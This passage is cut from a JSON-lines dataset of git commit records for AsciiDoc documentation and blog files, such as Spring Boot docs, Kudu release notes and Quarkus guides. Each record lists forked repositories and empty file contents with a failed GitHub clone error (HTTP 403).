2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63df29f1c7a3a6486fb8e2fe8612a194afd8cfd9","subject":"Update 2015-09-22-Protect-a-Fabric8-REST-Service-with-Apiman.adoc","message":"Update 2015-09-22-Protect-a-Fabric8-REST-Service-with-Apiman.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-09-22-Protect-a-Fabric8-REST-Service-with-Apiman.adoc","new_file":"_posts\/2015-09-22-Protect-a-Fabric8-REST-Service-with-Apiman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7dfd03da19d278ccc8adf3338024bd61792fb287","subject":"Add jreleaser guide for native 
executables","message":"Add jreleaser guide for native executables\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/jreleaser.adoc","new_file":"docs\/src\/main\/asciidoc\/jreleaser.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30cf9002879c48e190260d115d0e5dacd0fad8bb","subject":"[release notes]: update notes for RYW read mode","message":"[release notes]: update notes for RYW read mode\n\nChange-Id: I0bc5ae8452634a015891064bab5249eed6badf3e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9634\nTested-by: Hao Hao <99da4db57fde39d3df9f1908299d10b8082bf864@cloudera.com>\nReviewed-by: David Ribeiro Alves <dbbafdb4f25eb0c1ff3facf0e5f2f27705055af1@gmail.com>\n","repos":"andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73a55fd7e1e0949140bee417d3aabfdb6e8467ca","subject":"Add link to spring module docs to the release notes","message":"Add link to spring module docs to the release notes\n","repos":"raphw\/spock,raphw\/spock,siordache\/spock,spockframework\/spock,siordache\/spock,leonard84\/spock,raphw\/spock,siordache\/spock","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leonard84\/spock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c059f1374f57afc90153de5af49f0eb7e4109c3f","subject":"Update 2016-05-02-Blog-Post-Title.adoc","message":"Update 2016-05-02-Blog-Post-Title.adoc","repos":"abesn\/hubpress.io,abesn\/hubpress.io,abesn\/hubpress.io,abesn\/hubpress.io","old_file":"_posts\/2016-05-02-Blog-Post-Title.adoc","new_file":"_posts\/2016-05-02-Blog-Post-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abesn\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adb075a205ed817965c0e6e9a703e45d73aa8a7d","subject":"Update 2016-08-31-Texto-de-prueba.adoc","message":"Update 
2016-08-31-Texto-de-prueba.adoc","repos":"mager19\/mager19.github.io,mager19\/mager19.github.io,mager19\/mager19.github.io,mager19\/mager19.github.io","old_file":"_posts\/2016-08-31-Texto-de-prueba.adoc","new_file":"_posts\/2016-08-31-Texto-de-prueba.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mager19\/mager19.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49fefdafd86a2349cecaa1438a019cd5b6cdb392","subject":"Fix doc formatting","message":"Fix doc formatting\n\nCloses gh-6275\n","repos":"shakuzen\/spring-boot,mdeinum\/spring-boot,zhanhb\/spring-boot,RichardCSantana\/spring-boot,royclarkson\/spring-boot,shakuzen\/spring-boot,jvz\/spring-boot,ihoneymon\/spring-boot,bclozel\/spring-boot,mosoft521\/spring-boot,NetoDevel\/spring-boot,habuma\/spring-boot,lburgazzoli\/spring-boot,isopov\/spring-boot,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,candrews\/spring-boot,javyzheng\/spring-boot,jbovet\/spring-boot,philwebb\/spring-boot,minmay\/spring-boot,i007422\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,eddumelendez\/spring-boot,sbcoba\/spring-boot,felipeg48\/spring-boot,linead\/spring-boot,linead\/spring-boot,bclozel\/spring-boot,lburgazzoli\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,felipeg48\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,felipeg48\/spring-boot,htynkn\/spring-boot,shangyi0102\/spring-boot,ollie314\/spring-boot,jayarampradhan\/spring-boot,RichardCSantana\/spring-boot,mbenson\/spring-boot,candrews\/spring-boot,qerub\/spring-boot,hello2009chen\/spring-boot,bjornlindstrom\/spring-boot,mosoft521\/spring-boot,NetoDevel\/spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,shangyi0102\/spring-boot,Nowheresly\/spring-boot,deki\/spring-boot,bijukunjummen\/spring-boot,RichardCSantana\/spring-boot,jxblum\/spring-boot,bclozel\/spring-boot,qerub\/spring-boot,spring-projects\/spring-boot,isopov\/spring-boot,chrylis\/spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,zhanhb\/spring-boot,brettwooldridge\/spring-boot,zhanhb\/spring-boot,bijukunjummen\/spring-boot,Nowheresly\/spring-boot,sbcoba\/spring-boot,DeezCashews\/spring-boot,afroje-reshma\/spring-boot-sample,joshiste\/spring-boot,bclozel\/spring-boot,DeezCashews\/spring-boot,bijukunjummen\/spring-boot,bbrouwer\/spring-boot,Buzzardo\/spring-boot,mbenson\/spring-boot,pvorb\/spring-boot,pvorb\/spring-boot,ihoneymon\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,hello2009chen\/spring-boot,jxblum\/spring-boot,bbrouwer\/spring-boot,hello2009chen\/spring-boot,vpavic\/spring-boot,ptahchiev\/spring-boot,joshthornhill\/spring-boot,drumonii\/spring-boot,donhuvy\/spring-boot,pvorb\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,Nowheresly\/spring-boot,shakuzen\/spring-boot,nebhale\/spring-boot,ptahchiev\/spring-boot,lburgazzoli\/spring-boot,olivergierke\/spring-boot,akmaharshi\/jenkins,bijukunjummen\/spring-boot,tsachev\/spring-boot,aahlenst\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,deki\/spring-boot,tiarebalbi\/spring-boot,htynkn\/spring-boot,kdvolder\/spring-boot,i007422\/jenkins2-course-spring-boot,linead\/spring-boot,tiarebalbi\/spring-boot,sebastiankirsch\/spring-boot,bjornlindstrom\/spring-boot,NetoDevel\/spring-boot,michael-simons\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,mbenson\/spring-boot,mdeinum\/spri
ng-boot,qerub\/spring-boot,lucassaldanha\/spring-boot,eddumelendez\/spring-boot,i007422\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,drumonii\/spring-boot,hqrt\/jenkins2-course-spring-boot,javyzheng\/spring-boot,jxblum\/spring-boot,sbcoba\/spring-boot,hqrt\/jenkins2-course-spring-boot,aahlenst\/spring-boot,habuma\/spring-boot,yangdd1205\/spring-boot,candrews\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,yhj630520\/spring-boot,vpavic\/spring-boot,jxblum\/spring-boot,nebhale\/spring-boot,vakninr\/spring-boot,joshthornhill\/spring-boot,ptahchiev\/spring-boot,sebastiankirsch\/spring-boot,dreis2211\/spring-boot,ihoneymon\/spring-boot,rweisleder\/spring-boot,sebastiankirsch\/spring-boot,shangyi0102\/spring-boot,yangdd1205\/spring-boot,linead\/spring-boot,joshiste\/spring-boot,lburgazzoli\/spring-boot,htynkn\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tsachev\/spring-boot,lexandro\/spring-boot,tiarebalbi\/spring-boot,royclarkson\/spring-boot,akmaharshi\/jenkins,Nowheresly\/spring-boot,NetoDevel\/spring-boot,vpavic\/spring-boot,linead\/spring-boot,michael-simons\/spring-boot,vakninr\/spring-boot,ilayaperumalg\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,rweisleder\/spring-boot,ilayaperumalg\/spring-boot,donhuvy\/spring-boot,mosoft521\/spring-boot,jvz\/spring-boot,kamilszymanski\/spring-boot,cleverjava\/jenkins2-course-spring-boot,drumonii\/spring-boot,jayarampradhan\/spring-boot,mbogoevici\/spring-boot,akmaharshi\/jenkins,lucassaldanha\/spring-boot,javyzheng\/spring-boot,nebhale\/spring-boot,dreis2211\/spring-boot,DeezCashews\/spring-boot,ihoneymon\/spring-boot,sbcoba\/spring-boot,hqrt\/jenkins2-course-spring-boot,habuma\/spring-boot,lburgazzoli\/spring-boot,minmay\/spring-boot,bclozel\/spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,cleverjava\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,jvz\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joshiste\/spring-boot,donhuvy\/spring-boot,kamilszymanski\/spring-boot,chrylis\/spring-boot,bbrouwer\/spring-boot,olivergierke\/spring-boot,zhanhb\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,habuma\/spring-boot,hqrt\/jenkins2-course-spring-boot,minmay\/spring-boot,jayarampradhan\/spring-boot,isopov\/spring-boot,tiarebalbi\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,Nowheresly\/spring-boot,mbogoevici\/spring-boot,Buzzardo\/spring-boot,olivergierke\/spring-boot,hqrt\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,jayarampradhan\/spring-boot,tsachev\/spring-boot,pvorb\/spring-boot,eddumelendez\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,kdvolder\/spring-boot,donhuvy\/spring-boot,NetoDevel\/spring-boot,brettwooldridge\/spring-boot,deki\/spring-boot,scottfrederick\/spring-boot,royclarkson\/spring-boot,RichardCSantana\/spring-boot,nebhale\/spring-boot,yhj630520\/spring-boot,jvz\/spring-boot,philwebb\/spring-boot,mbogoevici\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,akmaharshi\/jenkins,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,herau\/spring-boot,lexandro\/spring-boot,mbogoevici\/spring-boot,scottfrederick\/spring-boot,isopov\/spring-boot,mbenson\/spring-boot,DeezCashews\/spring-boot,habuma\/spring-boot,lucassaldanha\/spring-boot,mdeinum\/spring-boot,bjornlindstrom\/spring-boot,donhuvy\/spring-boot,javyzheng\/spring-boot,candrews\/spring-boot,kdvolder\/spring-boot,deki\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins
2-course-spring-boot,jxblum\/spring-boot,ihoneymon\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,zhanhb\/spring-boot,xiaoleiPENG\/my-project,jbovet\/spring-boot,scottfrederick\/spring-boot,yhj630520\/spring-boot,bijukunjummen\/spring-boot,xiaoleiPENG\/my-project,jvz\/spring-boot,joshiste\/spring-boot,habuma\/spring-boot,kdvolder\/spring-boot,vakninr\/spring-boot,herau\/spring-boot,joshthornhill\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,kdvolder\/spring-boot,ilayaperumalg\/spring-boot,mbogoevici\/spring-boot,joshthornhill\/spring-boot,olivergierke\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot,yangdd1205\/spring-boot,chrylis\/spring-boot,scottfrederick\/spring-boot,michael-simons\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,javyzheng\/spring-boot,ihoneymon\/spring-boot,mdeinum\/spring-boot,mbenson\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,lucassaldanha\/spring-boot,ollie314\/spring-boot,michael-simons\/spring-boot,SaravananParthasarathy\/SPSDemo,aahlenst\/spring-boot,SaravananParthasarathy\/SPSDemo,SaravananParthasarathy\/SPSDemo,chrylis\/spring-boot,pvorb\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,shakuzen\/spring-boot,drumonii\/spring-boot,philwebb\/spring-boot,brettwooldridge\/spring-boot,brettwooldridge\/spring-boot,sebastiankirsch\/spring-boot,rweisleder\/spring-boot,herau\/spring-boot,lexandro\/spring-boot,lucassaldanha\/spring-boot,isopov\/spring-boot,i007422\/jenkins2-course-spring-boot,lexandro\/spring-boot,afroje-reshma\/spring-boot-sample,ollie314\/spring-boot,dreis2211\/spring-boot,candrews\/spring-boot,bbrouwer\/spring-boot,felipeg48\/spring-boot,deki\/spring-boot,akmaharshi\/jenkins,spring-projects\/spring-boot,tsachev\/spring-boot,tiarebalbi\/spring-boot,minmay\/spring-boot,mdeinum\/spring-boot,yhj630520\/spring-boot,philwebb\/spring-boot,lexandro\/spring-boot,vakninr\/spring-boot,qerub\/spring-boot,felipeg48\/spring-boot,RichardCSantana\/spring-boot,isopov\/spring-boot,nebhale\/spring-boot,kamilszymanski\/spring-boot,tsachev\/spring-boot,jbovet\/spring-boot,SaravananParthasarathy\/SPSDemo,Buzzardo\/spring-boot,scottfrederick\/spring-boot,tsachev\/spring-boot,olivergierke\/spring-boot,i007422\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,DeezCashews\/spring-boot,yhj630520\/spring-boot,ollie314\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,bbrouwer\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,rweisleder\/spring-boot,ptahchiev\/spring-boot,afroje-reshma\/spring-boot-sample,jbovet\/spring-boot,minmay\/spring-boot,herau\/spring-boot,qerub\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,wilkinsona\/spring-boot,mosoft521\/spring-boot,sebastiankirsch\/spring-boot,ptahchiev\/spring-boot,kdvolder\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,hello2009chen\/spring-boot,vpavic\/spring-boot,eddumelendez\/spring-boot,mdeinum\/spring-boot,shakuzen\/spring-boot,sbcoba\/spring-boot,hello2009chen\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,joshiste\/spring-boot,donhuvy\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,felipeg48\/spring-boot,wilkinsona\/spring-boot,xiaoleiPENG\/my-project,mosoft521\/spring-boot,royclarkson\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,bjornlindstrom\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,shangyi0102\/spring-boot,herau\/spring-boot","ol
d_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5cdd874d55248b93bfe6ccfd1290e924bea8b43e","subject":"Document `@AutoconfigureOrder`","message":"Document `@AutoconfigureOrder`\n\nCloses gh-4546\n","repos":"htynkn\/spring-boot,royclarkson\/spring-boot,kdvolder\/spring-boot,yhj630520\/spring-boot,deki\/spring-boot,jxblum\/spring-boot,lucassaldanha\/spring-boot,ptahchiev\/spring-boot,xiaoleiPENG\/my-project,mrumpf\/spring-boot,qerub\/spring-boot,DeezCashews\/spring-boot,brettwooldridge\/spring-boot,candrews\/spring-boot,royclarkson\/spring-boot,htynkn\/spring-boot,vakninr\/spring-boot,hello2009chen\/spring-boot,qerub\/spring-boot,nebhale\/spring-boot,sebastiankirsch\/spring-boot,ilayaperumalg\/spring-boot,RichardCSantana\/spring-boot,ollie314\/spring-boot,philwebb\/spring-boot,jxblum\/spring-boot,vpavic\/spring-boot,afroje-reshma\/spring-boot-sample,kamilszymanski\/spring-boot,sbuettner\/spring-boot,rweisleder\/spring-boot,xiaoleiPENG\/my-project,izeye\/spring-boot,NetoDevel\/spring-boot,ilayaperumalg\/spring-boot,jmnarloch\/spring-boot,deki\/spring-boot,donhuvy\/spring-boot,bclozel\/spring-boot,tiarebalbi\/spring-boot,spring-projects\/spring-boot,javyzheng\/spring-boot,SaravananParthasarathy\/SPSDemo,akmaharshi\/jenkins,dfa1\/spring-boot,habuma\/spring-boot,ameraljovic\/spring-boot,neo4j-contrib\/spring-boot,linead\/spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,tiarebalbi\/spring-boot,lexandro\/spring-boot,bijukunjummen\/spring-boot,brettwooldridge\/spring-boot,philwebb\/spring-boot,joshiste\/spring-boot,jayarampradhan\/spring-boot,shangyi0102\/spring-boot,jbovet\/spring-boot,yangdd1205\/spring-boot,sbcoba\/spring-boot,minmay\/spring-boot,bijukunjummen\/spring-boot,mbogoevici\/spring-boot,kdvolder\/spring-boot,scottfrederick\/spring-boot,jmnarloch\/spring-boot,ihoneymon\/spring-boot,nebhale\/spring-boot,mdeinum\/spring-boot,shakuzen\/spring-boot,eddumelendez\/spring-boot,bclozel\/spring-boot,mbenson\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mbenson\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot,lenicliu\/spring-boot,brettwooldridge\/spring-boot,ollie314\/spring-boot,dfa1\/spring-boot,pvorb\/spring-boot,izeye\/spring-boot,sebastiankirsch\/spring-boot,thomasdarimont\/spring-boot,shangyi0102\/spring-boot,tiarebalbi\/spring-boot,lexandro\/spring-boot,jvz\/spring-boot,NetoDevel\/spring-boot,javyzheng\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,tsachev\/spring-boot,jayarampradhan\/spring-boot,ihoneymon\/spring-boot,akmaharshi\/jenkins,RichardCSantana\/spring-boot,spring-projects\/spring-boot,lenicliu\/spring-boot,cleverjava\/jenkins2-course-spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,felipeg48\/spring-boot,bjornlindstrom\/spring-boot,jmnarloch\/spring-boot,jvz\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,tsachev\/spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot,ameraljovic\/spring-boot,neo4j-contrib\/spring-boot,eddumelendez\/spring-boot,michael-simons\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,linead\/spring-boot,eddumelendez\/spring-boot,izeye\/spring-boot,i007422\/jenkins2-course-spring-boot,
habuma\/spring-boot,thomasdarimont\/spring-boot,qerub\/spring-boot,mdeinum\/spring-boot,felipeg48\/spring-boot,drumonii\/spring-boot,cleverjava\/jenkins2-course-spring-boot,lenicliu\/spring-boot,bjornlindstrom\/spring-boot,wilkinsona\/spring-boot,sbuettner\/spring-boot,RichardCSantana\/spring-boot,jvz\/spring-boot,SaravananParthasarathy\/SPSDemo,yangdd1205\/spring-boot,deki\/spring-boot,mdeinum\/spring-boot,dfa1\/spring-boot,jbovet\/spring-boot,jbovet\/spring-boot,scottfrederick\/spring-boot,mbogoevici\/spring-boot,xiaoleiPENG\/my-project,tsachev\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,kdvolder\/spring-boot,thomasdarimont\/spring-boot,tiarebalbi\/spring-boot,wilkinsona\/spring-boot,bjornlindstrom\/spring-boot,akmaharshi\/jenkins,nebhale\/spring-boot,yangdd1205\/spring-boot,Nowheresly\/spring-boot,afroje-reshma\/spring-boot-sample,joshiste\/spring-boot,shakuzen\/spring-boot,sebastiankirsch\/spring-boot,vpavic\/spring-boot,sbcoba\/spring-boot,izeye\/spring-boot,aahlenst\/spring-boot,scottfrederick\/spring-boot,pvorb\/spring-boot,scottfrederick\/spring-boot,candrews\/spring-boot,shakuzen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,neo4j-contrib\/spring-boot,Buzzardo\/spring-boot,zhangshuangquan\/spring-root,SaravananParthasarathy\/SPSDemo,sebastiankirsch\/spring-boot,jbovet\/spring-boot,herau\/spring-boot,dfa1\/spring-boot,Nowheresly\/spring-boot,isopov\/spring-boot,shakuzen\/spring-boot,dreis2211\/spring-boot,Nowheresly\/spring-boot,minmay\/spring-boot,htynkn\/spring-boot,candrews\/spring-boot,chrylis\/spring-boot,olivergierke\/spring-boot,htynkn\/spring-boot,akmaharshi\/jenkins,linead\/spring-boot,bclozel\/spring-boot,dreis2211\/spring-boot,spring-projects\/spring-boot,RichardCSantana\/spring-boot,ilayaperumalg\/spring-boot,michael-simons\/spring-boot,zhanhb\/spring-boot,shangyi0102\/spring-boot,ptahchiev\/spring-boot,mbenson\/spring-boot,thomasdarimont\/spring-boot,wilkinsona\/spring-boot,ameraljovic\/spring-boot,jvz\/spring-boot,DeezCashews\/spring-boot,vakninr\/spring-boot,jbovet\/spring-boot,lburgazzoli\/spring-boot,joshiste\/spring-boot,bclozel\/spring-boot,lburgazzoli\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,tiarebalbi\/spring-boot,royclarkson\/spring-boot,habuma\/spring-boot,jvz\/spring-boot,tsachev\/spring-boot,hqrt\/jenkins2-course-spring-boot,lexandro\/spring-boot,chrylis\/spring-boot,joshthornhill\/spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot-concourse,drumonii\/spring-boot,afroje-reshma\/spring-boot-sample,DeezCashews\/spring-boot,dreis2211\/spring-boot,mbogoevici\/spring-boot,jxblum\/spring-boot,ihoneymon\/spring-boot,philwebb\/spring-boot,sbuettner\/spring-boot,zhanhb\/spring-boot,mosoft521\/spring-boot,Nowheresly\/spring-boot,xiaoleiPENG\/my-project,chrylis\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,zhangshuangquan\/spring-root,aahlenst\/spring-boot,mosoft521\/spring-boot,vpavic\/spring-boot,hello2009chen\/spring-boot,htynkn\/spring-boot,minmay\/spring-boot,zhangshuangquan\/spring-root,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,joansmith\/spring-boot,zhanhb\/spring-boot,minmay\/spring-boot,joansmith\/spring-boot,RichardCSantana\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,xiaoleiPENG\/my-project,eddumelendez\/spring-boot,hqrt\/jenkins2-course-spring-boot,mosoft521\/spring-boot,yhj630520\/spring-boot,olivergierke\/spring-boot,joshthornhill\/spring-boot,isopov\/spring-boot,mrumpf\/spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,bbrouwer\/spring-boot,scottfrederick\/spr
ing-boot,mbogoevici\/spring-boot,jayarampradhan\/spring-boot,vpavic\/spring-boot,isopov\/spring-boot,yhj630520\/spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,jmnarloch\/spring-boot,pvorb\/spring-boot,pvorb\/spring-boot,kamilszymanski\/spring-boot,linead\/spring-boot,javyzheng\/spring-boot,felipeg48\/spring-boot,michael-simons\/spring-boot,bjornlindstrom\/spring-boot,bijukunjummen\/spring-boot,hqrt\/jenkins2-course-spring-boot,jmnarloch\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,habuma\/spring-boot,DeezCashews\/spring-boot,NetoDevel\/spring-boot,kdvolder\/spring-boot,joshthornhill\/spring-boot,kdvolder\/spring-boot,pvorb\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,lucassaldanha\/spring-boot,yhj630520\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,jayarampradhan\/spring-boot,bclozel\/spring-boot,i007422\/jenkins2-course-spring-boot,zhanhb\/spring-boot,NetoDevel\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,javyzheng\/spring-boot,bjornlindstrom\/spring-boot,vpavic\/spring-boot,isopov\/spring-boot,lburgazzoli\/spring-boot,eddumelendez\/spring-boot,Buzzardo\/spring-boot,ollie314\/spring-boot,hqrt\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,ptahchiev\/spring-boot,bijukunjummen\/spring-boot,vakninr\/spring-boot,bijukunjummen\/spring-boot,donhuvy\/spring-boot,dreis2211\/spring-boot,herau\/spring-boot,spring-projects\/spring-boot,candrews\/spring-boot,linead\/spring-boot,philwebb\/spring-boot,philwebb\/spring-boot,vakninr\/spring-boot,joshthornhill\/spring-boot,zhanhb\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,lexandro\/spring-boot,shangyi0102\/spring-boot,ptahchiev\/spring-boot,mosoft521\/spring-boot,SaravananParthasarathy\/SPSDemo,akmaharshi\/jenkins,bbrouwer\/spring-boot,tsachev\/spring-boot,joshiste\/spring-boot,spring-projects\/spring-boot,afroje-reshma\/spring-boot-sample,Nowheresly\/spring-boot,ollie314\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,hello2009chen\/spring-boot,donhuvy\/spring-boot,ptahchiev\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,sbuettner\/spring-boot,herau\/spring-boot,aahlenst\/spring-boot,SaravananParthasarathy\/SPSDemo,michael-simons\/spring-boot,sbuettner\/spring-boot,spring-projects\/spring-boot,neo4j-contrib\/spring-boot,royclarkson\/spring-boot,mrumpf\/spring-boot,donhuvy\/spring-boot,philwebb\/spring-boot-concourse,bbrouwer\/spring-boot,jxblum\/spring-boot,lburgazzoli\/spring-boot,mdeinum\/spring-boot,sebastiankirsch\/spring-boot,ihoneymon\/spring-boot,hello2009chen\/spring-boot,lucassaldanha\/spring-boot,brettwooldridge\/spring-boot,bbrouwer\/spring-boot,Buzzardo\/spring-boot,yhj630520\/spring-boot,DeezCashews\/spring-boot,donhuvy\/spring-boot,bbrouwer\/spring-boot,mosoft521\/spring-boot,lexandro\/spring-boot,wilkinsona\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ameraljovic\/spring-boot,lucassaldanha\/spring-boot,ilayaperumalg\/spring-boot,kdvolder\/spring-boot,kamilszymanski\/spring-boot,vpavic\/spring-boot,shakuzen\/spring-boot,sbcoba\/spring-boot,eddumelendez\/spring-boot,drumonii\/spring-boot,ptahchiev\/spring-boot,cleverjava\/jenkins2-course-spring-boot,izeye\/spring-boot,mdeinum\/spring-boot,NetoDevel\/spring-boot,olivergierke\/spring-boot,lenicliu\/spring-boot,joshthornhill\/spring-boot,nebhale\/spring-boot,Buzzardo\/spring-boot,dreis2211\/spr
ing-boot,qerub\/spring-boot,sbcoba\/spring-boot,chrylis\/spring-boot,joansmith\/spring-boot,joshiste\/spring-boot,nebhale\/spring-boot,deki\/spring-boot,mrumpf\/spring-boot,i007422\/jenkins2-course-spring-boot,hello2009chen\/spring-boot,i007422\/jenkins2-course-spring-boot,joshiste\/spring-boot,felipeg48\/spring-boot,thomasdarimont\/spring-boot,royclarkson\/spring-boot,zhangshuangquan\/spring-root,joansmith\/spring-boot,mbogoevici\/spring-boot,rweisleder\/spring-boot,minmay\/spring-boot,mrumpf\/spring-boot,qerub\/spring-boot,javyzheng\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,zhanhb\/spring-boot,drumonii\/spring-boot,philwebb\/spring-boot-concourse,chrylis\/spring-boot,brettwooldridge\/spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,ameraljovic\/spring-boot,felipeg48\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-